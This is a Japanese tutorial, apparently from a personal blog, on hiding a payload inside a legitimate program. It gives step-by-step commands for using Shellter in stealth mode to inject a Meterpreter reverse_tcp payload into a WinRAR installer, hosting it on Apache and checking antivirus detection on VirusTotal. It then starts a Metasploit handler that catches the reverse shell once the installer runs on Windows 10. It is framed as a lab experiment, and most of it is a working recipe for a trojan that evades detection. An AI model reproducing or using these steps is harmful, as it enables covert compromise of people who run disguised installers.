ペイロードに別ファイルの結合
ターゲットにペイロードを実行させても
別の画面がでてきたり
何も実行されないと不審に思われるので
ペイロードに別ファイルを結合し2つのプログラムを実行させることで
偽装させるという手法がある
これが bind
使われる手法としては
画像ファイルにペイロードが結合されていたて
画像を表示したらペイロードが実行されるというもの
あとは
トロイの木馬にゲームと結合させてゲームが起動してプレイできるが
裏ではトロイの木馬の感染処理が進むというもの
今回は KaliLinux と WIndows10 で実験
まず
WinRaR のインストーラーを取得
https://www.win-rar.com/download.html?&L=0
から32bit のものをダウンロード
1 | cp Downloads /wrar580 .exe /root/Desktop/ |
でファイルをデスクトップへコピーしておく
次に
Shellter のインストール
1 | apt install shellter |
次に shellter の初期設定
1 | shellter |
で起動
ここからは対話形式で設定
1 | Choose Operation Mode - Auto /Manual (A /M/H ): |
となるので自動にしたいので
A
1 | PE Target: |
で対象ファイルを選ぶので
/root/Desktop/wrar580.exe
を指定
1 | Enable Stealth Mode? (Y /N/H ): |
でステルスを有効化するので Y
1 | Use a listed payload or custom? (L /C/H ): |
となるので
リストから選ぶので L を選択
これでリストがでてくる
今回使うのは revrse_tpc なので
1 | Select payload by index: |
では1を入力
次に
1 | SET LHOST: |
となるので KaliLinux のIPを入力
次に使うポートの指定
1 | SET LPORT: |
となるので4444を入力
最後に
1 | Press [Enter] to continue ... |
となったら Enter
これで作成できたので
1 2 | cp Desktop /wrar580 .exe /var/www/html/share/ service apache2 restart |
でペイロードがダウンロードできるようにしておく
次にウイルス検知にどれくらい引っかかるかチェック
https://www.virustotal.com/ja/
へアクセスし
Choose file をクリック
wrrar580.exeを選び調査
これで70の検知システムのうち27引っかかっているということがわかる
これでファイルは作成できたので
KaliLinux でリバースシェルの待受
1 | msfconsole |
でMetasploit を起動
1 2 3 4 5 | use exploit /multi/handler set payload windows /meterpreter/reverse_tcp set lhost 192.168.1.134 set lport 4444 exploit |
で待受開始
あとは windows10 でリアルタイム保護を無効化した状態で
ブラウザで
wrrar580.exe をダウンロードし実行
これでMeterpreter セッションが確立される